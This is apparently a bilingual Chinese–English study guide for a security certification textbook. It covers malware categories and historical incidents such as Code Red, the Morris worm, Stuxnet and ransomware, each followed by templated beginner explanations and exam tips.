通过Facebook、WhatsApp、Snapchat以及其他社交媒体和消息平台传播。 有关此主题的更多信息,恶意软件追踪网站 Snopes 维护了一个病毒骗局列表,地址 为 www.snopes.com/tag/virus-hoaxes-realities。 逻辑炸弹 逻辑炸弹是恶意代码对象,它们感染系统后处于休眠状态,直到满足一个或多 个条件(如时间、程序启动、网站登录、特定按键等)时才被触发。 绝大多数 逻辑炸弹由软件开发人员植入自定义应用程序中,以确保如果他们意外离开公 司,其工作将被销毁。 逻辑炸弹有多种形态和规模。 事实上,许多病毒和特洛伊木马都包含逻辑炸弹 组件。 2013年3月,一种逻辑炸弹针对韩国的组织发动了攻击。 这种恶意软件 渗透了韩国媒体公司和金融机构的系统,导致系统中断和数据丢失。 在此案例 中,当韩国政府怀疑该逻辑炸弹是朝鲜发动攻击的前兆时,恶意软件攻击触发 了军事警报。 逻辑炸弹也可能由恶意开发者深度集成到现有系统中,而非作为独立的代码对 象存在。 例如,2019年7月,一名为西门子公司工作的承包商承认,他在该合 同下开发的软件中植入了逻辑炸弹。

该逻辑炸弹的目的是定期破坏软件,迫使 西门子公司再次雇佣他来修复问题,从而确保他获得稳定的业务来源。 他在被 抓获并被判处六个月监禁之前,成功实施了这一计划超过两年。 特洛伊木马 系统管理员不断警告计算机用户,除非绝对确信软件来自可信来源,否则不要 从互联网下载和安装软件。 事实上,许多公司严格禁止安装未经IT部门预先审 查的任何软件。 这些政策旨在最大限度地降低组织网络被木马——一种看似无 害的软件程序——入侵的风险

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 10 / PDF P1404

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

but carries a malicious, behind-the-scenes payload that has the potential to wreak havoc on a system or network. Trojans differ very widely in functionality. Some will destroy all the data stored on a system in an attempt to cause a large amount of damage in as short a time frame as possible. Some are fairly innocuous. For example, a series of Trojans claimed to provide PC users with the ability to run games designed for the Microsoft Xbox gaming system on their computers. When users ran the program, it simply didn't work. However, it also inserted a value into the Windows Registry that caused a specific web page to open each time the computer booted.

The Trojan creators hoped to cash in on the advertising revenue generated by the large number of page views their website received from the Xbox Trojan horses. Unfortunately for them, antivirus experts quickly discovered their true intentions, and the website was shut down. One category of Trojan that has recently made a significant impact on the security community is rogue antivirus software. This software tricks the user into installing it by claiming to be an antivirus package, often under the guise of a pop-up ad that mimics the look and feel of a security warning.

Once the user installs the software, it either steals personal information or prompts the user for payment to “update” the rogue antivirus. The “update” simply disables the Trojan. Remote access Trojans (RATs) are a subcategory of Trojans that open backdoors in systems that grant the attacker remote administrative control of the infected system. For example, a RAT might open a Secure Shell (SSH) port on a system that allows the attacker to use a preconfigured account to access the system and then send a notice to the attacker that the system is ready and waiting for a connection.

Other Trojans are designed to steal computing power from infected systems for use in mining Bitcoin or other cryptocurrencies. This use of computing power yields a financial reward for the attacker. Trojans and other malware that perform cryptocurrency mining are also known as cryptomalware.

中文直译 / 整理

但其背后隐藏着恶意的有效载荷,可能对系统或网络造成严重破坏。 木马的功能差异极大。 有些木马会破坏系统中存储的所有数据,试图在尽可能 短的时间内造成巨大破坏; 有些则相对无害。 例如,有一系列木马声称能够使 PC用户在计算机上运行专为微软Xbox游戏系统设计的游戏。 当用户运行该程 序时,它根本无法工作。 然而,它还会在Windows注册表中插入一个值,导致 每次计算机启动时都会打开某个特定网页。 木马的创建者希望借助其网站因 Xbox木马病毒获得的大量页面浏览量来获取广告收入。 不幸的是,反病毒专家 很快发现了它们的真实意图,该网站已被关闭。 最近对安全社区产生重大影响的一种木马类别是假冒反病毒软件。 这种软件通 过伪装成反病毒程序来诱骗用户安装,通常以模仿安全警告外观和风格的弹出 广告形式出现。 一旦用户安装了该软件,它要么窃取个人信息,要么提示用户 支付费用以“更新”这款假冒反病毒软件。 所谓的“更新”只是禁用了木马本 身。 远程访问木马(RATs)是木马的一个子类,它们在系统中打开后门,使攻击者 能够远程控制被感染的系统。

例如,一个RAT可能在系统上打开一个安全外壳 (SSH)端口,允许攻击者使用预配置的账户访问系统,然后向攻击者发送通 知,告知系统已准备就绪并等待连接。 其他木马旨在窃取受感染系统的计算能力,用于挖矿比特币或其他加密货币。 这种计算能力的使用为攻击者带来了经济回报。 执行加密货币挖矿的木马和 其他恶意软件也被称为cryptomalware。

小白解释

场景先行:开发团队要上线登录功能。安全不是上线前扫一下漏洞,而是从需求、设计、编码、测试、发布到运维都要参与。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:安全太晚介入,修复成本高,还可能把漏洞带到生产环境。

你作为负责人可以这样想:在 SDLC 早期做威胁建模、代码审查、测试和发布控制。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

读完后用一句话复述:如果我是应用安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是应用安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 11 / PDF P1405

第 1405 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Botnets A few years ago, one of the authors of this book visited an organization that suspected it had a security problem, but the organization didn't have the expertise to diagnose or resolve the issue. The major symptom was network slowness. A few basic tests found that none of the systems on the company's network ran basic antivirus software, and some of them were infected with a Trojan horse. Why did this cause network slowness? Well, the Trojan horse made all the infected systems members of a botnet, a collection of computers (sometimes thousands or even millions) across the Internet under the control of an attacker known as the botmaster.

The botmaster of this particular botnet used the systems on their network as part of a denial-of-service attack against a website that he didn't like for one reason or another. He instructed all the systems in his botnet to retrieve the same web page, over and over again, in hopes that the website would fail under the heavy load. With close to 30 infected systems on the organization's network, the botnet's attack was consuming almost all its bandwidth. The solution was simple: Antivirus software was installed on the systems, and it removed the Trojan horse. Network speeds returned to normal quickly.

More detailed coverage of botnets appeared in Chapter 17, “Preventing and Responding to Incidents.” Worms Worms pose a significant risk to network security. They contain the same destructive potential as other malicious code objects with an added twist— they propagate themselves without requiring any human intervention. The Internet Worm was the first major computer security incident to occur on the Internet. Since that time, thousands of new worms and their variants have unleashed their destructive power on the Internet. The following sections examine some specific worms.

中文直译 / 整理

僵尸网络 几年前,本书的一位作者访问了一家机构,该机构怀疑自己存在安全问题, 但缺乏诊断或解决该问题的专业知识。 主要症状是网络缓慢。 经过一些基 本测试发现,该公司网络中的所有系统均未运行基本的防病毒软件,其中 一些系统已被木马感染。 这为何导致网络变慢? 原因是,该木马程序将所有被感染的系统变成了 一个僵尸网络的成员,这是一个由攻击者(称为僵尸主控者)控制的、 遍布互联网的计算机集合(有时多达数千台甚至数百万台)。 这个特定僵尸网络的僵尸主控者,将网络中的系统用于对一个他不喜欢的网 站发起拒绝服务攻击,原因可能多种多样。 他命令其僵尸网络中的所有系统 反复请求同一网页,希望网站在巨大负载下崩溃。 由于该组织网络中接近 30台系统被感染,僵尸网络的攻击几乎耗尽了全部带宽。 解决方案很简单:在系统上安装了防病毒软件,并移除了木马程序。 网络 速度很快恢复正常。 关于僵尸网络的更详细内容见第17章,“事件的预防 与响应。 ” 蠕虫 蠕虫对网络安全构成重大威胁。 它们具有与其他恶意代码对象相同的破 坏潜力,但额外的特点是:无需任何人为干预即可自我传播。 互联网蠕虫是互联网上发生的首个重大计算机安全事件。

自那时以来,成千 上万种新的蠕虫及其变种在互联网上释放了它们的破坏力。 以下部分将考察 一些特定的蠕虫。

小白解释

场景先行:开发团队要上线登录功能。安全不是上线前扫一下漏洞,而是从需求、设计、编码、测试、发布到运维都要参与。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:安全太晚介入,修复成本高,还可能把漏洞带到生产环境。

你作为负责人可以这样想:在 SDLC 早期做威胁建模、代码审查、测试和发布控制。

本页术语用人话说:

程序:程序是一步一步怎么做。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

读完后用一句话复述:如果我是应用安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1405 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是应用安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

本页术语拆解
程序 程序是一步一步怎么做。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 12 / PDF P1406

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Code Red Worm The Code Red worm received a good deal of media attention in the summer of 2001 when it rapidly spread among web servers running unpatched versions of Microsoft's Internet Information Server (IIS). Code Red performed three malicious actions on the systems it penetrated: It randomly selected hundreds of Internet Protocol (IP) addresses and then probed those addresses to see whether they were used by hosts running a vulnerable version of IIS. Any systems it found were quickly compromised. This greatly magnified Code Red's reach because each host it infected sought many new targets.

It defaced HTML pages on the local web server, replacing normal content with the following text: Welcome to http://www.worm.com! Hacked By Chinese! It planted a logic bomb that would initiate a denial-of-service attack against the IP address 198.137.240.91, which at that time belonged to the web server hosting the White House's home page. Quick-thinking government web administrators changed the White House's IP address before the attack actually began. The destructive power of worms poses an extreme risk to the modern internet. System administrators must ensure that they apply appropriate security patches to their internet-connected systems as software vendors release them.

As a case in point, a security fix for an IIS vulnerability exploited by Code Red was available from Microsoft for more than a month before the worm attacked the Internet. Had security administrators applied it promptly, Code Red would have been a miserable failure.

中文直译 / 整理

红色代码蠕虫 2001年夏季,Code Red蠕虫在运行未打补丁版本的微软互联网信息服务器( IIS)的Web服务器中迅速传播,引起了大量媒体关注。 Code Red在其渗透的 系统上执行了三种恶意操作: 它随机选择数百个互联网协议(IP)地址,然后探测这些地址,以判断它 们是否被运行存在漏洞的IIS版本的主机使用。 它发现的任何系统都会迅速 被入侵。 这极大地扩大了红色代码的传播范围,因为每个被感染的主机都 会寻找大量新目标。 它篡改了本地Web服务器上的HTML页面,将正常内容替换为以下文本: 欢迎访问 http://www.worm.com! 由中国 黑客入侵! 它植入了一个逻辑炸弹,计划对IP地址198.137.240.91发起拒绝服务攻击, 该地址当时属于托管白宫主页的Web服务器。 政府网站管理员迅速行动, 在攻击实际开始前更改了白宫的IP地址。 蠕虫的破坏力对现代互联网构成了极端风险。 系统管理员必须在软件供应商发 布安全补丁后,及时为其联网系统应用适当的安全补丁。 以Code Red为例, 微软早在蠕虫攻击互联网前一个多月就已发布了针对IIS漏洞的安全修复程序。

如果安全管理员能及时应用该补丁,Code Red本会以惨败告终。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 13 / PDF P1407

第 1407 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

RTM and the Internet Worm In November 1988, a young computer science student named Robert Tappan Morris brought the fledgling internet to its knees with a few lines of computer code. He released onto the Internet a malicious worm he claimed to have created as an experiment. It spread quickly and crashed a large number of systems. This worm spread by exploiting four specific security holes in the Unix operating system: Sendmail Debug Mode Then-current versions of the popular Sendmail software package used to route electronic mail messages across the Internet contained a security vulnerability.

This vulnerability allowed the worm to spread itself by sending a specially crafted email message that contained the worm's code to the Sendmail program on a remote system. When the remote system processed the message, it became infected. Password Attack The worm also used a dictionary attack to attempt to gain access to remote systems by utilizing the username and password of a valid system user. This is frequently done either by brute force or by using prebuilt password lists. Finger Vulnerability Finger, a popular internet utility, allowed users to determine who was logged on to a remote system.

Then-current versions of the Finger software contained a buffer-overflow vulnerability that allowed the worm to spread (see “Buffer Overflows,” later in this chapter). The Finger program has since been removed from most internet-connected systems. Trust Relationships After the worm infected a system, it analyzed any existing trust relationships with other systems on the network and attempted to spread itself to those systems through the trusted path. This multipronged approach made the Internet Worm extremely dangerous. Fortunately, the (then-small) computer security community quickly put together a crack team of investigators who disarmed the worm and patched the affected systems.

Their efforts were facilitated by several inefficient routines in the worm's code that limited the rate of its spread. Because of the lack of experience among law enforcement authorities and the court system in dealing with computer crimes, along with a lack of relevant laws, Morris received only a slap on the wrist for RTM

中文直译 / 整理

与互联网蠕虫 1988年11月,一名名叫罗伯特·塔潘·莫里斯的年轻计算机科学学生,仅用几 行代码便使初生的互联网陷入瘫痪。 他释放了一个声称是作为实验而创建 的恶意蠕虫。 该蠕虫迅速传播,并导致大量系统崩溃。 该蠕虫通过利用 Unix 操作系统中的四个特定安全漏洞进行传播: Sendmail 调试模式当时流行的 Sendmail 软件包用于在互联网上路由电 子邮件,其中包含一个安全漏洞。 该漏洞允许蠕虫通过发送特制的电子邮 件消息来传播自身,该消息包含蠕虫代码并发送到远程系统的 Send mail 程序。 当远程系统处理该消息时,便被感染。 密码攻击蠕虫还使用字典攻击,尝试通过利用有效系统用户的用户名和密 码获取对远程系统的访问权限。 这通常通过暴力破解或使用预构建的密码 列表来实现。 Finger 漏洞Finger 是一种流行的互联网工具,允许用户确定谁登录到了 远程系统。 当时的 Finger 软件版本存在缓冲区溢出漏洞,使蠕虫得以传播 (参见本章后面的“缓冲区溢出”)。 此后,Finger 程序已从大多数互联 网连接的系统中移除。

信任关系蠕虫感染系统后,会分析该系统与网络中其他系统之间的任何现 有信任关系,并尝试通过受信任的路径向这些系统传播自身。 这种多管齐下的方法使互联网蠕虫变得极其危险。 幸运的是,当时规模尚 小的计算机安全社区迅速组建了一支调查小组,成功解除了蠕虫的威胁并 修补了受影响的系统。 他们的努力得益于蠕虫代码中几个效率低下的例程, 这些例程限制了蠕虫的传播速度。 由于执法部门和司法系统在处理计算机 犯罪方面缺乏经验,且缺乏相关法律,莫里斯仅因这一行为受到了轻微处 罚

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

程序:程序是一步一步怎么做。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1407 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

IPS 放在线路中,误报可能影响可用性。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
程序 程序是一步一步怎么做。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 14 / PDF P1408

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

his transgression. He was sentenced to 3 years’ probation, 400 hours of community service, and a $10,000 fine under the Computer Fraud and Abuse Act of 1986. Ironically, Morris's father, Robert Morris, was serving as the director of the National Security Agency's National Computer Security Center (NCSC) at the time of the incident. Stuxnet In mid-2010, a worm named Stuxnet surfaced on the Internet. This highly sophisticated worm uses a variety of advanced techniques to spread, including multiple previously undocumented vulnerabilities.

Stuxnet uses the following propagation techniques: Searching for unprotected administrative shares of systems on the local network Exploiting zero-day vulnerabilities in the Windows Server service and Windows Print Spooler service Connecting to systems using a default database password Spreading by the use of shared infected USB drives While Stuxnet spread from system to system with impunity, it was actually searching for a very specific type of system—one using a controller manufactured by Siemens and allegedly used in the production of material for nuclear weapons.

When it found such a system, it executed a series of actions designed to destroy centrifuges attached to the Siemens controller. Stuxnet appeared to begin its spread in the Middle East, specifically on systems located in Iran. It is alleged to have been designed by Western nations with the intent of disrupting an Iranian nuclear weapons program. According to a story in The New York Times, a facility in Israel contained equipment used to test the worm.

The story stated, “Israel has spun nuclear centrifuges nearly identical to Iran's” and went on to say that “the operations there, as well as related efforts in the United States, are … clues that the virus was designed as an American-Israeli project to sabotage the Iranian program.” If these allegations are true, Stuxnet marks two major evolutions in the world of malicious code: the use of a worm to cause major physical damage to a facility and the use of malicious code in warfare between nations. 。

中文直译 / 整理

他被判处三年缓刑、400小时社区服务,并根据1986年《计算机欺诈与 滥用法案》处以10,000美元罚款。 颇具讽刺意味的是,莫里斯的父亲罗伯 特·莫里斯当时正担任美国国家安全局国家计算机安全中心(NCSC)主任。 Stuxnet 2010年年中,一个名为Stuxnet的蠕虫在互联网上出现。 这种高度复杂的蠕虫 采用多种先进技术进行传播,包括多个此前未公开的漏洞。 Stuxnet使用以下传 播技术: 扫描本地网络上系统未受保护的管理共享 利用Windows Server服务和Windows打印后台处理程序服务中的零日漏 洞 使用默认数据库密码连接到系统 通过共享被感染的USB驱动器进行传播 尽管Stuxnet在系统间肆意传播,但它实际上是在寻找一种非常特定的系统—— 使用西门子制造的控制器并据称用于生产核武器材料的系统。 当它发现此类 系统时,便会执行一系列旨在摧毁连接到西门子控制器的离心机的操作。 Stuxnet似乎始于中东,特别是位于伊朗的系统。 据称,它是由西方国家设计, 旨在破坏伊朗的核武器计划。 根据《纽约时报》的一篇报道,以色列的一个设 施中包含用于测试该蠕虫的设备。

该报道指出:"以色列已制造出与伊朗几乎完 全相同的核离心机",并进一步表示:"以色列的这些操作,以及美国的相关努 力,都是⋯⋯病毒被设计为美以联合项目以破坏伊朗计划的线索。 " 如果这些指控属实,Stuxnet标志着恶意代码领域的两大重要演变:利用蠕虫对 设施造成重大物理破坏,以及在国家间战争中使用恶意代码。

小白解释

场景先行:开发团队要上线登录功能。安全不是上线前扫一下漏洞,而是从需求、设计、编码、测试、发布到运维都要参与。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:安全太晚介入,修复成本高,还可能把漏洞带到生产环境。

你作为负责人可以这样想:在 SDLC 早期做威胁建模、代码审查、测试和发布控制。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

读完后用一句话复述:如果我是应用安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是应用安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 15 / PDF P1409

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

Spyware and Adware Two other types of unwanted software interfere with the way you normally use your computer. Spyware monitors your actions and transmits important details to a remote system that spies on your activity. For example, spyware might wait for you to log into a banking website and then transmit your username and password to the creator of the spyware. Alternatively, it might wait for you to enter your credit card number on an ecommerce site and transmit it to a fraudster to resell on the black market. Adware, while quite similar to spyware in form, has a different purpose. It uses a variety of techniques to display advertisements on infected computers.

The simplest forms of adware display pop-up ads on your screen while you surf the web. More nefarious versions may monitor your shopping behavior and redirect you to competitor websites. Both spyware and adware fit into a category of software known as potentially unwanted programs (PUPs), software that a user might consent to installing on their system that then carries out functions that the user did not desire or authorize. Adware and malware authors often take advantage of thirdparty plug-ins to popular internet tools, such as web browsers, to spread their malicious content.

The authors find plug-ins that already have a strong subscriber base that granted the plug-in permission to run within their browser and/or gain access to their information. They then supplement the original plug-in code with malicious code that spreads malware, steals information, or performs other unwanted activity. Ransomware Ransomware is a type of malware that weaponizes cryptography. After infecting a system through many of the same techniques used by other types of malware, ransomware then generates an encryption key known only to the ransomware author and uses that key to encrypt critical files on the system's hard drive and any mounted drives.

This encryption renders the data inaccessible to the authorized user or anyone else other than the malware author.

中文直译 / 整理

间谍软件和广告软件 另外两种不必要的软件会干扰您正常使用计算机的方式。 间谍软件会监控您的 操作,并将重要细节传输给监控您活动的远程系统。 例如,间谍软件可能会等 待您登录银行网站,然后将您的用户名和密码发送给间谍软件的创建者。 或者, 它可能会等待您在电子商务网站上输入信用卡号,并将其传输给欺诈者,以便 在黑市上转售。 广告软件虽然在形式上与间谍软件非常相似,但其目的不同。 它使用多种技术 在受感染的计算机上显示广告。 最简单的广告软件形式是在您上网时在屏幕上 弹出广告。 更恶意的版本可能会监控您的购物行为,并将您重定向到竞争对手 的网站。 间谍软件和广告软件都属于一类被称为潜在不需要的程序(PUPs)的软件, 这类软件是用户可能同意安装到其系统中的,但随后会执行用户并未期望或授 权的功能。 广告软件和恶意软件作者经常利用流行互联网工具(如网页浏览器) 的第三方插件来传播其恶意内容。 作者会寻找那些已拥有大量订阅用户、 且已授予插件在浏览器中运行权限或访问其信息权限的插件。 然后,他们 在原始插件代码中添加恶意代码,以传播恶意软件、窃取信息或执行其他 不希望的活动。 勒索软件 勒索软件 是一种利用密码学的恶意软件。

在通过与其他类型恶意软件相同的多 种技术感染系统后,勒索软件会生成一个仅勒索软件作者知晓的加密密钥,并 使用该密钥加密系统硬盘及任何已挂载驱动器上的关键文件。 这种加密使数据 对授权用户或其他任何人(除恶意软件作者外)均无法访问。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

程序:程序是一步一步怎么做。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Step-by-step、SOP 常对应 procedure。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
程序 程序是一步一步怎么做。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 16 / PDF P1410

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

The user is then presented with a message notifying them that their files were encrypted and demanding payment of a ransom before a specific deadline to prevent the files from becoming permanently inaccessible. Some attackers go further and threaten that they will publicly release sensitive information if the ransom is not paid. Ransomware has been around since 1989, but its use and impact have accelerated in recent years. Whereas original ransomware attacks targeted individual users and demanded relatively small payments in the hundreds of dollars, recent attacks have targeted large enterprises.

Law enforcement agencies, hospitals, and government offices have all fallen victim to largescale, sophisticated ransomware attacks. In fact, according to research by Check Point, in 2023, for every 10 organizations worldwide, one experienced a ransomware attack attempt. Organizations experiencing ransomware attacks are left in the difficult position of deciding how to move forward. Those with strong backup and recovery programs may suffer some downtime as they work to rebuild systems from those backups and remediate them to prevent a future infection. Those who lack data find themselves pressured to pay the ransom in order to regain access to their data.

Attackers understand this difficult position and take advantage of their upper hand. A study by Statista found that in 2023, some 73 percent of organizations around the world who reported ransomware infections chose to pay the ransom. This presents affected companies with a challenging ethical dilemma: Should they pay the ransom and reward criminal behavior or risk permanently losing access to their data?

中文直译 / 整理

